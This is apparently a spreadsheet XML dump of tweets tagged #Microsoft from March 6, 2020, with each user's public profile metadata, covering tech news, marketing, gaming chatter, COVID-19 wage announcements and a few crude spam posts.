  <si>
    <t>{'id': 67237690, 'id_str': '67237690', 'name': 'A K', 'screen_name': 'gigabyte10100', 'location': 'Austin, Texas USA', 'description': 'Traveler, Academic, Dog Lover, Nature Lover, Reader, Writer, Celiac, ENTJ', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 323, 'friends_count': 549, 'listed_count': 23, 'created_at': 'Thu Aug 20 05:26:06 +0000 2009', 'favourites_count': 2866, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2170,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'http://pbs.twimg.com/profile_images/1089043813488680960/4dIc2U7L_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1089043813488680960/4dIc2U7L_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/67237690/1548483254',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</si>
  <si>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Fri Mar 06 06:16:31 +0000 2020</t>
  </si>
  <si>
    <t>I agree to lose shame tonight #Providence   #microsoft #fantasy https://t.co/Dj94xYnsS5</t>
  </si>
  <si>
    <t>{'id': 1235783434095689729, 'id_str': '1235783434095689729', 'name': 'Oksana Suhr', 'screen_name': 'wordmarlezip', 'location': 'Newark, USA', 'description': 'Women are meant to be loved, not to be understood', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1, 'friends_count': 15, 'listed_count': 0, 'created_at': 'Fri Mar 06 04:25:15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'http://pbs.twimg.com/profile_images/1235789111048445954/duHOD2YE_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235789111048445954/duHOD2YE_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235783434095689729/1583470126',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</si>
  <si>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06:16:14 +0000 2020</t>
  </si>
  <si>
    <t>Facebook Messenger for Windows 10 to soon get even better with multi-account support https://t.co/fVOHRhKoYB #microsoft #feedly</t>
  </si>
  <si>
    <t>{'id': 2188027502, 'id_str': '2188027502', 'name': 'DIE WIENBURG.', 'screen_name': 'die_wienburg', 'location': 'MÃ¼nster, DE', 'description': 'IT news &amp; updates - daily | #Office365 #Microsoft365 \n#DigitaleBildung #DigitalTransformation | about: https://t.co/RFdb4Lgdkb', 'url': 'https://t.co/LQvfY2u9aQ', 'entities': {'url': {'urls': [{'url': 'https://t.co/LQvfY2u9aQ', 'expanded_url': 'http://www.die-wienburg.com', 'display_url': 'die-wienburg.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/RFdb4Lgdkb', 'expanded_url': 'http://www.die-wienburg.eu/p/impressum.html', 'display_url': 'die-wienburg.eu/p/impressum.htâ€¦', 'indices': [103, 126]}]}}, 'protected': False, 'followers_count': 16216, 'friends_count': 15598, 'listed_count': 188, 'created_at': 'Mon Nov 11 09:18:06 +0000 2013', 'favourites_count': 6603, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 45584,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'http://pbs.twimg.com/profile_images/1141579184273285120/oYUiKWgq_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1141579184273285120/oYUiKWgq_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2188027502/1561007890',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</si>
  <si>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06:15:30 +0000 2020</t>
  </si>
  <si>
    <t>How to Version a REST API
#programming #programmer #developer #coding #nodejs #code  #dev #development #python #sql #html5 #mysql #css3 #javascript #js #tech #react #github #git #microsoft #vuejs #redux #docker #frontend #backend #rest #api #express https://t.co/wei1cL7fkM</t>
  </si>
  <si>
    <t>{'id': 1223010254, 'id_str': '1223010254', 'name': 'Jorge Garcia Gomez', 'screen_name': 'jorgardev', 'location': 'Madrid, Comunidad de Madrid', 'description': 'Full Stack Web Developer', 'url': 'https://t.co/h8HokOSJ7u', 'entities': {'url': {'urls': [{'url': 'https://t.co/h8HokOSJ7u', 'expanded_url': 'http://www.jorgegarciagomez.es', 'display_url': 'jorgegarciagomez.es', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 271, 'friends_count': 86, 'listed_count': 6, 'created_at': 'Tue Feb 26 21:34:32 +0000 2013', 'favourites_count': 50, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 593,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'http://pbs.twimg.com/profile_images/987554870600388609/xXf4gHlm_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/987554870600388609/xXf4gHlm_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1223010254/1526156032',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</si>
  <si>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06:15:17 +0000 2020</t>
  </si>
  <si>
    <t>Catch up with us on the latest! #Microsoft #MicrosoftLife #Picard  #ILoveMeOutNow #GreysAnatomy #SpotifyAwards #SUGA #BreakingNews #ApexLegends #Bernie2020 #COVID19 #FridayFeeling #SidNaaz #InternationalWomensDay #MUFC #Maddow 
https://t.co/kfNDUXARsp</t>
  </si>
  <si>
    <t>{'id': 1062124370, 'id_str': '1062124370', 'name': 'Chroniclez Podcast', 'screen_name': 'chroniclezpdcst', 'location': '', 'description': 'Host of the show folks! We cover politics, sports, entertainment etc. Artist, writer, philosopher, networker. Sponsor of OTH magazine and mixtapes.', 'url': 'https://t.co/p8p9IAHyfF', 'entities': {'url': {'urls': [{'url': 'https://t.co/p8p9IAHyfF', 'expanded_url': 'http://chroniclezpodcast.libsyn.com', 'display_url': 'chroniclezpodcast.libsyn.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2222, 'friends_count': 4939, 'listed_count': 34, 'created_at': 'Sat Jan 05 04:17:09 +0000 2013', 'favourites_count': 18939, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 21178,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'http://pbs.twimg.com/profile_images/956398403449012224/0OO_pkJU_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/956398403449012224/0OO_pkJU_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1062124370/1518739126',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</si>
  <si>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06:13:46 +0000 2020</t>
  </si>
  <si>
    <t>Pros &amp;amp; cons of migrating from #MicrosoftDynamics #GP (on-prem.) to #Microsoft #Dynamics365 #BusinessCentral (on-cloud).
An informed decision about your #erpsystem: https://t.co/PIzDS91X48
#innovation #accounting #operations #affordable #efficient #effective #entrepreneurship</t>
  </si>
  <si>
    <t>{'id': 1080303047924801536, 'id_str': '1080303047924801536', 'name': 'Edocation', 'screen_name': 'edocation_ca', 'location': 'Calgary, Alberta', 'description': 'Serving Canadians and people worldwide, we empower individuals &amp; companies to achieve their personal and corporate objectives with the help of IT &amp; education.', 'url': 'https://t.co/8YRo274Cl0', 'entities': {'url': {'urls': [{'url': 'https://t.co/8YRo274Cl0', 'expanded_url': 'https://edocation.ca/', 'display_url': 'edocation.ca', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3, 'friends_count': 0, 'listed_count': 0, 'created_at': 'Wed Jan 02 03:21:32 +0000 2019', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 179,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'http://pbs.twimg.com/profile_images/1080303623957929984/mwIJUnGt_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1080303623957929984/mwIJUnGt_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1080303047924801536/1546400448',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</si>
  <si>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06:13:25 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Teams is First Office App for Linux
 #slack #Azure #Microsoft
https://t.co/B0j1m3U3Q4</t>
  </si>
  <si>
    <t>Fri Mar 06 06:12:50 +0000 2020</t>
  </si>
  <si>
    <t>As we work to protect public health, we also need to protect the income of hourly workers who support our campus - Microsoft on the Issues
https://t.co/YXuC6QwvcK 
#Corona #Microsoft</t>
  </si>
  <si>
    <t>{'id': 208526250, 'id_str': '208526250', 'name': 'GÎ›URANG DIVÎ£CHA', 'screen_name': 'GaurangDivecha', 'location': 'Dubai, United Arab Emirates', 'description': 'Time is a flat circle.', 'url': 'https://t.co/QZAzwmgjDH', 'entities': {'url': {'urls': [{'url': 'https://t.co/QZAzwmgjDH', 'expanded_url': 'http://sway.com/NIqr1VsCewcNY3Ce', 'display_url': 'sway.com/NIqr1VsCewcNY3â€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 572, 'friends_count': 2464, 'listed_count': 24, 'created_at': 'Wed Oct 27 12:52:55 +0000 2010', 'favourites_count': 2220, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6291,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'http://pbs.twimg.com/profile_images/1177211146606141442/nhyIs0fJ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1177211146606141442/nhyIs0fJ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/208526250/1569504193', 'profile_link_color': 'E4007C',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</si>
  <si>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06:10:01 +0000 2020</t>
  </si>
  <si>
    <t>What Fiction Writing Software Is Best for You?
#microsoft #google #writingsoftware #wordprocessor #writingtips #paperandpens #reusablenotebooks #rocketbook
https://t.co/COXPAJCFuM</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</si>
  <si>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20424, 'friends_count': 21659, 'listed_count': 167, 'created_at': 'Thu Jun 25 16:20:49 +0000 2009', 'favourites_count': 4530, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 68667,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</si>
  <si>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Mar 06 06:06:49 +0000 2020</t>
  </si>
  <si>
    <t>Late night work. Utilizing #Microsoft's tools for #Advertising/#Marketing #Campaigns. Highly effective. Extremely excited to meet new prospects. I'm dedicated to providing the best #CustomerService I can provide. #ITSolution #Tech #TechSupport #RJOVentuesInc #BrandingPower365 https://t.co/IpPboIajp7</t>
  </si>
  <si>
    <t>{'id': 362030209, 'id_str': '362030209', 'name': 'Richard John', 'screen_name': 'RichardJohn786', 'location': '', 'description': 'Information Technology', 'url': 'https://t.co/3GtvE7ycMo', 'entities': {'url': {'urls': [{'url': 'https://t.co/3GtvE7ycMo', 'expanded_url': 'http://www.richardjohn.me', 'display_url': 'richardjohn.me', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 435, 'friends_count': 5, 'listed_count': 183, 'created_at': 'Thu Aug 25 18:48:19 +0000 2011', 'favourites_count': 6656, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 7716,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'http://pbs.twimg.com/profile_images/1214169083928666112/KZtwcruS_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1214169083928666112/KZtwcruS_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/362030209/1578078269', 'profile_link_color': '1B95E0',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</si>
  <si>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Fri Mar 06 06:06:39 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve">
#Microsoft's #opensource #code-sharing #platform's latest report places #freedomofexpression above all else.
#GitHub
https://t.co/91UXOfkG7O</t>
  </si>
  <si>
    <t>{'id': 811930805366878212, 'id_str': '811930805366878212', 'name': 'Sofia Legal Hackers', 'screen_name': 'SofiaHackers', 'location': 'Sofia, Bulgaria', 'description': 'The Sofia, Bulgaria ðŸ‡§ðŸ‡¬ chapter of \n@LegalHackers\nWhere law &amp; tech intersect ðŸš€âš–ï¸ðŸ¤–\n#LegalHack', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 220, 'friends_count': 788, 'listed_count': 8, 'created_at': 'Thu Dec 22 13:46:03 +0000 2016', 'favourites_count': 49, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 218, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/811933498164543488/jWNKnRB__normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/811933498164543488/jWNKnRB__normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/811930805366878212/1572792431',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</si>
  <si>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06:04:02 +0000 2020</t>
  </si>
  <si>
    <t>DON'T MISS the #Dubai stop of the HPE &amp;amp; #Microsoft #HybridCloud Roadshow on 11th March. More info here: https://t.co/z80k13eMMK
#HPEalliances #UAE #DubaiDigital #UAEtech #HybridIT https://t.co/0uuLhVXDb6</t>
  </si>
  <si>
    <t>Fri Mar 06 06:01:23 +0000 2020</t>
  </si>
  <si>
    <t>If you want to fuck me in the ass, do a retweet #Milton   #microsoft #wine https://t.co/zCR8sM9V5K</t>
  </si>
  <si>
    <t>{'id': 1235643746504642560, 'id_str': '1235643746504642560', 'name': 'Shannon Bell', 'screen_name': 'orhapormo', 'location': 'Salem, USA', 'description': 'If music be the food of love, play on.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1, 'friends_count': 34, 'listed_count': 0, 'created_at': 'Thu Mar 05 19:10:12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'http://pbs.twimg.com/profile_images/1235666463198978048/Nc56rYMK_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235666463198978048/Nc56rYMK_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235643746504642560/1583440850',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</si>
  <si>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06:01:11 +0000 2020</t>
  </si>
  <si>
    <t>ManekTech is now MICROSOFT GOLD PARTNER. Achieving a Gold partnership is our major step in strengthening our technical capabilities and skills in Microsoft technologies.
For more  Info Please Visit: https://t.co/cY7QAFGyPf
#microsoftgoldpartner #microsoft #technology #cloud # https://t.co/LPLrbNfK5O</t>
  </si>
  <si>
    <t>{'id': 1227567919468433408, 'id_str': '1227567919468433408', 'name': 'Pravinsinh Ker', 'screen_name': 'KerPravinsinh', 'location': 'Ahmedabad', 'description': 'NET Consultant | Microsoft Gold Certified Partner | Custom Software | ERP | CRM | Business Consultant at ManekTech', 'url': 'https://t.co/mEI5WA7aRx', 'entities': {'url': {'urls': [{'url': 'https://t.co/mEI5WA7aRx', 'expanded_url': 'http://www.manektech.com', 'display_url': 'manektech.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 9, 'friends_count': 68, 'listed_count': 0, 'created_at': 'Wed Feb 12 12:20:01 +0000 2020', 'favourites_count': 53,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'http://pbs.twimg.com/profile_images/1227568159147716608/HMYdkbhg_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1227568159147716608/HMYdkbhg_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1227567919468433408/1581515387',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</si>
  <si>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06:01:03 +0000 2020</t>
  </si>
  <si>
    <t>Man I really need to get back into swat
#xbox #xboxone #masterchief #halo5 #microsoft #guns #2ndamendment #america #pyrography #woodburning #pyrographyart #games #gamerguy #gamer #gamer4life... https://t.co/eUOZWtjpP1</t>
  </si>
  <si>
    <t>{'id': 80783366, 'id_str': '80783366', 'name': 'DUKECITY117', 'screen_name': 'DUKECITY117', 'location': 'MERICAðŸ‡ºðŸ‡¸', 'description': 'snap is dukecitygamer', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 542, 'friends_count': 1051, 'listed_count': 33, 'created_at': 'Thu Oct 08 06:30:11 +0000 2009', 'favourites_count': 9550, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 45571,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'http://pbs.twimg.com/profile_images/1228828524019978240/eH2WRtgf_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1228828524019978240/eH2WRtgf_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/80783366/1580358571',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</si>
  <si>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05:58:40 +0000 2020</t>
  </si>
  <si>
    <t>Come on @Bungie whats this really why do this to Titans I feel like we got the hand me down from  grandpa collection who styles this #Xbox #Microsoft #XboxOneX #Destiny #Destiny2 #Mixer #twitch  #gamer #gamers #game #games https://t.co/ZaPTJuDGka</t>
  </si>
  <si>
    <t>{'id': 1215731342601834496, 'id_str': '1215731342601834496', 'name': 'Samoan Push', 'screen_name': 'Samoanpush', 'location': '', 'description': 'CBO of MELEE MEDIA avid gamer and appreciator of sports follow me at the savage land podcast at all streaming services', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 24, 'friends_count': 69, 'listed_count': 0, 'created_at': 'Fri Jan 10 20:25:45 +0000 2020', 'favourites_count': 358, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 140, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1215731674002214915/gY9yMn3S_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1215731674002214915/gY9yMn3S_normal.jpg',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</si>
  <si>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05:52:12 +0000 2020</t>
  </si>
  <si>
    <t>Azure Sentinel in Side-by-Side with Splunk https://t.co/Z5IaWb443h #Microsoft</t>
  </si>
  <si>
    <t>Fri Mar 06 05:50:38 +0000 2020</t>
  </si>
  <si>
    <t>1 new repository created in Microsoft
- 1 Intune-Config-Frameworks
 #GitHub #OpenSource #microsoft</t>
  </si>
  <si>
    <t>{'id': 1107350121656668160, 'id_str': '1107350121656668160', 'name': 'Follow GitHub Organization', 'screen_name': 'followgithuborg', 'location': '', 'description': 'Follow GitHub organization and get notified when a new repository is created, @hackpravj', 'url': 'https://t.co/amIBVLJfl9', 'entities': {'url': {'urls': [{'url': 'https://t.co/amIBVLJfl9', 'expanded_url': 'http://followgithub.org', 'display_url': 'followgithub.org', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 71, 'friends_count': 25, 'listed_count': 4, 'created_at': 'Sun Mar 17 18:36:57 +0000 2019', 'favourites_count': 13, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3099, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1107351117178896384/loqwjOmt_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1107351117178896384/loqwjOmt_normal.png',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</si>
  <si>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05:49:06 +0000 2020</t>
  </si>
  <si>
    <t>@Azure update of the day:
#Microsoft #MicrosoftAzure #Azure #linkedinlearning
https://t.co/KIMj31Wk8e</t>
  </si>
  <si>
    <t>{'id': 4202322833, 'id_str': '4202322833', 'name': 'TomonLinkedInLearning', 'screen_name': 'tomvideo2brain', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 200, 'friends_count': 315, 'listed_count': 19, 'created_at': 'Mon Nov 16 14:19:41 +0000 2015', 'favourites_count': 7487, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 6835,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'http://pbs.twimg.com/profile_images/1085068386680406017/0RDz7s8L_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1085068386680406017/0RDz7s8L_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4202322833/1547535397',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</si>
  <si>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05:46:59 +0000 2020</t>
  </si>
  <si>
    <t>Weve achieved #Microsoft Azure Expert Managed Services Provider (MSP) status. Discover what this means and what you can expect from us moving forwards: 
https://t.co/3GU63kOtVs https://t.co/ZbLME3yyJk</t>
  </si>
  <si>
    <t>{'id': 159322865, 'id_str': '159322865', 'name': 'TDLogicalis', 'screen_name': 'TDLogicalis', 'location': 'Sydney &amp; Melbourne, Australia', 'description': 'We are now Thomas Duryea Logicalis! Australiaâ€™s leading ICT consulting, professional services and managed services company. Please follow us at @TDLogicalis.', 'url': 'https://t.co/HLVDXfKZ7q', 'entities': {'url': {'urls': [{'url': 'https://t.co/HLVDXfKZ7q', 'expanded_url': 'http://www.tdlogicalis.com.au', 'display_url': 'tdlogicalis.com.au', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2812, 'friends_count': 3670, 'listed_count': 562, 'created_at': 'Fri Jun 25 02:13:30 +0000 2010', 'favourites_count': 470, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4342,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'http://pbs.twimg.com/profile_images/992234604890177536/ccUF3Vp3_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/992234604890177536/ccUF3Vp3_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/159322865/1581914824', 'profile_link_color': 'DB0A0E', 'profile_sidebar_border_color': 'A11215', 'profile_sidebar_fill_color': 'EBEFF0', 'profile_text_color': '000319', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Mar 06 05:45:21 +0000 2020</t>
  </si>
  <si>
    <t>Never "several minutes" #microsoft #windows #fakenews https://t.co/RiNogqXQsy</t>
  </si>
  <si>
    <t>{'id': 27350463, 'id_str': '27350463', 'name': 'Ann Mackinnon', 'screen_name': 'annmackinnon', 'location': 'Minneapolis, MN', 'description': 'Tech sales/content marketing pro. Jersey girl living in Minneapolis. Mother, sailor, storyteller, golfer, foodie. Running with scissors to keep it interesting.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 47, 'friends_count': 89, 'listed_count': 4, 'created_at': 'Sun Mar 29 01:13:30 +0000 2009', 'favourites_count': 180, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 244,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'http://pbs.twimg.com/profile_images/1010577620797349888/ewVhbO56_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1010577620797349888/ewVhbO56_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/27350463/1533500596',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</si>
  <si>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05:44:02 +0000 2020</t>
  </si>
  <si>
    <t>Star Wars trying to fix the story holes is like Microsoft trying to update Windows 10. 
#StarWars #reylo #RiseofSkywalker #Windows10 #microsoft</t>
  </si>
  <si>
    <t>{'id': 24923995, 'id_str': '24923995', 'name': 'Venkat Swaminathan', 'screen_name': 'vswamina', 'location': 'USA', 'description': '#tech #photo #motorcycle #iot #aiml #hobbyelectronics #funnyguy\n\nmaking a hash of it all', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 50, 'friends_count': 266, 'listed_count': 2, 'created_at': 'Tue Mar 17 18:11:00 +0000 2009', 'favourites_count': 157, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 848,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'http://pbs.twimg.com/profile_images/1064385441674248198/da7PLnPD_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1064385441674248198/da7PLnPD_normal.jpg',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</si>
  <si>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05:41:40 +0000 2020</t>
  </si>
  <si>
    <t>Never "a few minutes" #microsoft #windows #fakenews https://t.co/ffEsLvFKUo</t>
  </si>
  <si>
    <t>Fri Mar 06 05:40:55 +0000 2020</t>
  </si>
  <si>
    <t>So excited and proud to join a company that shows exceptional leadership in the most difficult times. #Microsoft
https://t.co/DUNnvVOZvx</t>
  </si>
  <si>
    <t>{'id': 854525154713636864, 'id_str': '854525154713636864', 'name': 'Umme Salma Gadriwala', 'screen_name': 'bawrimirchi', 'location': 'Mississauga, Ontario', 'description': 'Burgers and milkshakes.', 'url': 'https://t.co/bolNeH7R5u', 'entities': {'url': {'urls': [{'url': 'https://t.co/bolNeH7R5u', 'expanded_url': 'http://ummesalma-gadriwala.carrd.co', 'display_url': 'ummesalma-gadriwala.carrd.co', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 46, 'friends_count': 79, 'listed_count': 2, 'created_at': 'Wed Apr 19 02:40:47 +0000 2017', 'favourites_count': 667, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1195,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'http://pbs.twimg.com/profile_images/1121125949037215745/Gg9DTrj7_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1121125949037215745/Gg9DTrj7_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/854525154713636864/1492570618',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</si>
  <si>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05:36:49 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft's commitment to customers during COVID-19 https://t.co/n9bg3hOuCs #MSTeams #Office365 #Azure https://t.co/b8W7Pp6Vsa</t>
  </si>
  <si>
    <t>Fri Mar 06 05:32:17 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft will pay hourly workers regular wages even if their hours are reduced because of COVID-19 concerns https://t.co/GYr00jOMTG #Microsoft</t>
  </si>
  <si>
    <t>Fri Mar 06 05:32:04 +0000 2020</t>
  </si>
  <si>
    <t>A new poll shows that workers at companies like #Amazon, #Microsoft, or #Google haven't seen their productivity suffer as they #workfromhome amid the spread of #coronavirus #covid19 #seattle #seattlecoronavirus #seattlecovid19 https://t.co/qJkckSOD1Q</t>
  </si>
  <si>
    <t>{'id': 1235303091685060608, 'id_str': '1235303091685060608', 'name': 'SeattleCOVID19', 'screen_name': 'SeattleCOVID19', 'location': 'Seattle, WA', 'description': 'Information &amp; News Relating to the Washington State COVID-19 Outbreak.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 7, 'friends_count': 50, 'listed_count': 0, 'created_at': 'Wed Mar 04 20:36:45 +0000 2020', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False,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'http://pbs.twimg.com/profile_images/1235305421746982920/BqlUZvME_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235305421746982920/BqlUZvME_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235303091685060608/1583357379',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</si>
  <si>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05:30:20 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Flight Simulator weekly update schedule hampered due to coronavirus concerns #microsoft #flightsimulator https://t.co/jQUb1V5gGK https://t.co/e46sIU2P31</t>
  </si>
  <si>
    <t>{'id': 1079473843, 'id_str': '1079473843', 'name': 'AZ', 'screen_name': 'AzArdit', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 154, 'friends_count': 275, 'listed_count': 52, 'created_at': 'Fri Jan 11 12:10:16 +0000 2013', 'favourites_count': 21115, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 44748,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'http://pbs.twimg.com/profile_images/1204432662674444289/ZC6W9uu6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1204432662674444289/ZC6W9uu6_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1079473843/1575994112',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</si>
  <si>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05:30:02 +0000 2020</t>
  </si>
  <si>
    <t>This year, #Microsoft is celebrating International Womens Day with a machine learning focus, bringing a day-long instructor-led, hands-on lab session for developers and data scientists. https://t.co/0Z9xOQ2b5t</t>
  </si>
  <si>
    <t>Fri Mar 06 05:27:03 +0000 2020</t>
  </si>
  <si>
    <t>Dont know why I didnt play this game before though , gonna start posting clips of this  #jozziiekillzz #gamingclips #rainbowsixsiege #rainbowsixclips #rainbow6memes #rainbow6seige #shootinggames #firstpersonshooter #consolegamer #xbox #ps4gamer #microsoft #sony https://t.co/ukLCxZFYlq</t>
  </si>
  <si>
    <t>{'id': 1015009202375307264, 'id_str': '1015009202375307264', 'name': 'jose solis', 'screen_name': 'JozziieKillzz', 'location': 'California, USA', 'description': 'â€¢iG:@JozziieKillzz â€¢Gaming is lifeðŸŽ® â€¢Happily doing what I do bestðŸ’ª â€¢ðŸ‘‰Apex LegendsðŸ‘ˆ â€¢Ps4ðŸŽ® â€¢TwitchðŸŽ®:Jozziie_Killzz â€¢Gaming Channel YT:JozziieKillzz', 'url': 'https://t.co/QpAt71dsj4', 'entities': {'url': {'urls': [{'url': 'https://t.co/QpAt71dsj4', 'expanded_url': 'https://m.youtube.com/watch?v=0S5w6_LcDP8', 'display_url': 'm.youtube.com/watch?v=0S5w6_â€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 6, 'friends_count': 25, 'listed_count': 0, 'created_at': 'Thu Jul 05 23:07:06 +0000 2018', 'favourites_count': 62, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 192, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1108551628242640897/78xrNWau_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1108551628242640897/78xrNWau_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1015009202375307264/1531191261',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</si>
  <si>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05:26:26 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft will pay hourly workers regular wages even if their hours are reduced because of COVID-19 concerns https://t.co/kcf8O8EpIV #tech #CSR #Microsoft #WorkFromHome #Experiment #RemoteWorking #Education #Business #OperatingCost</t>
  </si>
  <si>
